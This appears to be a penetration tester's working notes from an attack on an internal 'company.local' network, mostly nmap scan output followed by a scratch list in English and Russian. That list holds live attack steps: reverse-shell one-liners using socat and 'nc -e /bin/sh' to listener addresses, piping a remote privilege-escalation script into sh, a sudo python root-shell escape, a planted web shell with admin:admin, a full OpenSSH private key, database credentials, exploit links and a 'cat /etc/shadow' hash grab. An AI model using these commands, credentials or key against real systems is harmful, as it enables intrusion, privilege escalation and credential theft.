| Not valid before: 2022-02-17T13:49:29
|_Not valid after: 2022-08-19T13:49:29
|_ssl-date: 2022-03-11T07:50:43+00:00; -1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T07:50:25
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Nmap scan report for 10.11.4.8
Host is up (0.0042s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
| 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
| 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company)
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=BUCHGARM.company.local
| Not valid before: 2022-02-17T13:49:30
|_Not valid after: 2022-08-19T13:49:30
|_ssl-date: 2022-03-11T07:50:44+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: BUCHGARM
| DNS_Domain_Name: company.local
| DNS_Computer_Name: BUCHGARM.company.local
| DNS_Tree_Name: company.local
| Product_Version: 6.1.7601
|_ System_Time: 2022-03-11T07:50:22+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
49176/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BUCHGARM; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -35m59s, deviation: 1h20m28s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: BUCHGARM
| NetBIOS computer name: BUCHGARM\x00
| Domain name: company.local
| Forest name: company.local
| FQDN: BUCHGARM.company.local
|_ System time: 2022-03-11T10:50:25+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-03-11T07:50:25
|_ start_date: 2022-03-10T10:20:56
|_nbstat: NetBIOS name: BUCHGARM, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:dc:d1:b1 (unknown)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
Nmap scan report for 10.11.4.10
Host is up (0.0039s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-03-11T07:50:44+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sysadminarm.company.local
| Not valid before: 2022-02-17T13:49:30
|_Not valid after: 2022-08-19T13:49:30
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: SYSADMINARM
| DNS_Domain_Name: company.local
| DNS_Computer_Name: sysadminarm.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:50:22+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T07:50:28
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Nmap scan report for 10.11.4.13
Host is up (0.0085s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-03-11T07:50:44+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=enggeneral.company.local
| Not valid before: 2022-02-17T13:49:28
|_Not valid after: 2022-08-19T13:49:28
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: ENGGENERAL
| DNS_Domain_Name: company.local
| DNS_Computer_Name: enggeneral.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:50:22+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T07:50:34
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Post-scan script results:
| clock-skew:
| -35m59s:
| 10.11.4.8
| 10.11.4.13
|_ 10.11.4.10
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 4 IP addresses (4 hosts up) scanned in 106.10 seconds
```
### buf
## 10.11.239.0
### nmap
```bash
nmap 10.11.239.5,6 -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 09:09 MSK
Stats: 0:00:37 elapsed; 0 hosts completed (2 up), 2 undergoing Service Scan
Service scan Timing: About 52.63% done; ETC: 09:10 (0:00:32 remaining)
Nmap scan report for 10.11.239.5
Host is up (0.0020s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: company)
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.7001
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: Host: OIK-SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.239.6
Host is up (0.0011s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: company)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49176/tcp open msrpc Microsoft Windows RPC
Service Info: Host: OIK-CLIENT; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 81.77 seconds
```
```
─$ nmap 10.11.239.5,6 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 10:58 MSK
Nmap scan report for 10.11.239.5
Host is up (0.0025s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
| 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
| 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company)
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.7001.00; SP4
|_ssl-date: 2022-03-11T08:00:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-02-18T14:41:51
|_Not valid after: 2052-02-18T14:41:51
| ms-sql-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: OIK-SERVER
| DNS_Domain_Name: company.local
| DNS_Computer_Name: OIK-SERVER.company.local
| DNS_Tree_Name: company.local
|_ Product_Version: 6.1.7601
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: OIK-SERVER
| DNS_Domain_Name: company.local
| DNS_Computer_Name: OIK-SERVER.company.local
| DNS_Tree_Name: company.local
| Product_Version: 6.1.7601
|_ System_Time: 2022-03-11T08:00:21+00:00
|_ssl-date: 2022-03-11T08:00:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=OIK-SERVER.company.local
| Not valid before: 2022-02-17T13:50:14
|_Not valid after: 2022-08-19T13:50:14
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: Host: OIK-SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -25m42s, deviation: 1h08m02s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: OIK-SERVER, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:c2:6a:80 (unknown)
| ms-sql-info:
| 10.11.239.5:1433:
| Version:
| name: Microsoft SQL Server 2012 SP4
| number: 11.00.7001.00
| Product: Microsoft SQL Server 2012
| Service pack level: SP4
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: OIK-SERVER
| NetBIOS computer name: OIK-SERVER\x00
| Domain name: company.local
| Forest name: company.local
| FQDN: OIK-SERVER.company.local
|_ System time: 2022-03-11T11:00:21+03:00
| smb2-time:
| date: 2022-03-11T08:00:21
|_ start_date: 2022-02-18T14:41:50
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
Nmap scan report for 10.11.239.6
Host is up (0.00085s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
| 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
| 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2022-03-11T08:00:27+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: OIK-CLIENT
| DNS_Domain_Name: company.local
| DNS_Computer_Name: OIK-CLIENT.company.local
| DNS_Tree_Name: company.local
| Product_Version: 6.1.7601
|_ System_Time: 2022-03-11T08:00:21+00:00
| ssl-cert: Subject: commonName=OIK-CLIENT.company.local
| Not valid before: 2022-02-17T13:49:31
|_Not valid after: 2022-08-19T13:49:31
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49176/tcp open msrpc Microsoft Windows RPC
Service Info: Host: OIK-CLIENT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: OIK-CLIENT, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:cf:30:92 (unknown)
| smb2-time:
| date: 2022-03-11T08:00:22
|_ start_date: 2022-02-18T14:51:05
|_clock-skew: mean: -35m59s, deviation: 1h20m29s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: OIK-CLIENT
| NetBIOS computer name: OIK-CLIENT\x00
| Domain name: company.local
| Forest name: company.local
| FQDN: OIK-CLIENT.company.local
|_ System time: 2022-03-11T11:00:22+03:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
Post-scan script results:
| ssh-hostkey: Possible duplicate hosts
| Key 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA) used by:
| 10.11.239.5
| 10.11.239.6
| Key 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519) used by:
| 10.11.239.5
| 10.11.239.6
| Key 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA) used by:
| 10.11.239.5
|_ 10.11.239.6
| clock-skew:
| -25m42s:
| 10.11.239.5
|_ 10.11.239.6
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 88.26 seconds
```
### buf
## 10.11.240.0
### nmap
```bash
nmap 10.11.240.5,6,9,10,14 -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 09:12 MSK
Stats: 0:00:18 elapsed; 0 hosts completed (5 up), 5 undergoing Service Scan
Service scan Timing: About 42.11% done; ETC: 09:13 (0:00:23 remaining)
Nmap scan report for 10.11.240.5
Host is up (0.0044s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http JBoss Enterprise Application Platform
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.6
Host is up (0.0033s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http JBoss Enterprise Application Platform
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.9
Host is up (0.0042s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http JBoss Enterprise Application Platform
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.10
Host is up (0.0057s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http JBoss Enterprise Application Platform
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.14
Host is up (0.0068s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ELTO-ENTEK; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 5 IP addresses (5 hosts up) scanned in 71.15 seconds
```
```
$ nmap 10.11.240.5,6,9,10,14 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 11:01 MSK
Nmap scan report for 10.11.240.5
Host is up (0.0031s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:d8:f2:78:92:14:75:e6:9e:d4:ed:f0:b2:e6:44:2f (RSA)
| 256 bd:8f:6c:3f:d8:18:bb:97:fd:33:d7:c4:1f:4f:2c:b6 (ECDSA)
|_ 256 30:4f:4f:3d:a1:0b:e4:17:6f:b4:36:72:02:0f:d9:07 (ED25519)
80/tcp open http JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.6
Host is up (0.0045s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 52:cb:a2:13:84:e5:f3:42:4a:f1:30:30:b3:e3:e2:7a (RSA)
| 256 de:29:b3:5c:50:fc:e6:f1:be:e4:29:6a:ba:e4:47:da (ECDSA)
|_ 256 1c:53:b3:a6:85:a9:25:ce:59:4a:45:19:49:84:f9:b4 (ED25519)
80/tcp open http JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.9
Host is up (0.0064s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b4:dd:f5:7a:e2:c4:93:73:3e:ce:45:1b:1d:79:c3:18 (RSA)
| 256 bb:2f:86:6a:9e:a2:d4:9c:56:e7:79:75:7a:c8:0e:e7 (ECDSA)
|_ 256 fe:69:5a:3d:bf:fe:6c:86:41:7a:db:c7:d3:7c:ed:6c (ED25519)
80/tcp open http JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.10
Host is up (0.0055s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:c3:a5:0a:7c:6e:44:d9:d6:9c:7c:3d:7a:91:9a:93 (RSA)
| 256 be:76:29:57:0f:6d:b6:3c:c8:72:df:0f:07:b8:1a:fa (ECDSA)
|_ 256 b3:2a:9f:20:30:3c:2e:b5:fc:97:99:e8:7f:2f:60:c1 (ED25519)
80/tcp open http JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.240.14
Host is up (0.011s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
| 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
| 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2022-03-11T08:02:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=elto-entek
| Not valid before: 2022-02-17T05:58:15
|_Not valid after: 2022-08-19T05:58:15
| rdp-ntlm-info:
| Target_Name: ELTO-ENTEK
| NetBIOS_Domain_Name: ELTO-ENTEK
| NetBIOS_Computer_Name: ELTO-ENTEK
| DNS_Domain_Name: elto-entek
| DNS_Computer_Name: elto-entek
| Product_Version: 6.1.7601
|_ System_Time: 2022-03-11T08:02:47+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ELTO-ENTEK; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T08:02:46
|_ start_date: 2022-02-18T05:59:14
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: elto-entek
| NetBIOS computer name: ELTO-ENTEK\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-03-11T11:02:46+03:00
|_nbstat: NetBIOS name: ELTO-ENTEK, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:34:bb:98 (unknown)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
|_clock-skew: mean: -36m00s, deviation: 1h20m29s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 5 IP addresses (5 hosts up) scanned in 86.64 seconds
```
### buf
# Кидать новое сюда
10.11.3.20 - mx1.company.local
10.11.3.10 - ns2.company.local
10.11.3.50 - ns1.company.local
## FOr me
Ищу команду_WordPress_ФИНАЛЬНЫЙ ОТВЕТ №1
## Interesting things to do
10.11.2.10:80:8080
10.11.2.11 - Atrium web
10.11.240.5:80
10.11.240.10:80
http://10.11.2.10/wp-login.php
admin:admin
http://10.11.2.10/shell.php - sami podnyali
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
https://github.com/flozz/p0wny-shell
nc -e /bin/sh 10.11.5.11 1337
sudo python -c 'import os; os.system("/bin/sh")'
```cat ~/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
SbGQrFYE4l6Q5xAAAACWthbGlAa2FsaQE=
-----END OPENSSH PRIVATE KEY-----
```
```
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCyyyB611U70oijKjE1M3Es8qFqGfLAlrx3tRDgJ5mFOBnZV42S1jNiOhsamziBASK/lSPBrLm/+vXDlae1B0mYcQQ++n+UOR2Wz9eu1N32zLY4CVL5nlmeafT+rMim5Q+0F6S8tGSINdCcqqY5KIDZqhw1uZjk7idA56ZV/aU0CfPvv66xG4VeMXDmHOvqAQ17BzXnm71uaVuaYC3cgYZao/DIDkygWobZMCbA7Mr1bhvZunzZ2h9aIvwrQfE8qTPdp+Ggms6Fig813Oc7BjCZpfiWyJo0ka7BvQOYcLRLw9c1TQeuHlW9IPo4W28iWwSC9rWxftsInZ/jUEzFFzqmh95IDin+eFdD0mYIhoPXfKDUImoqiZeGnsSr4UszvzkIH72bKwTo2zNPcfAdrRqO7jlGkp4nTekaxk8hA/NVWRZrP1NqWyWusb1gSFxkhxL+Su4fwn0pEMe7cAm06PaVzZ5HkCLRD+2afSdgaBvxnBGfpT5rF5mm+je6vKSySPM= kali@kali
```
www-data ALL=(ALL:ALL) NOPASSWD: /usr/bin/python
https://github.com/dreadlocked/Drupalgeddon2
sudo gem install highline
'username' => 'drupaluser',
'password' => 'DruP@ss531',
https://book.hacktricks.xyz/pentesting/pentesting-rdp
custarm.company.local - 10.11.4.6
https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c
## New things
### Хешики
```bash
$ cat /etc/shadow
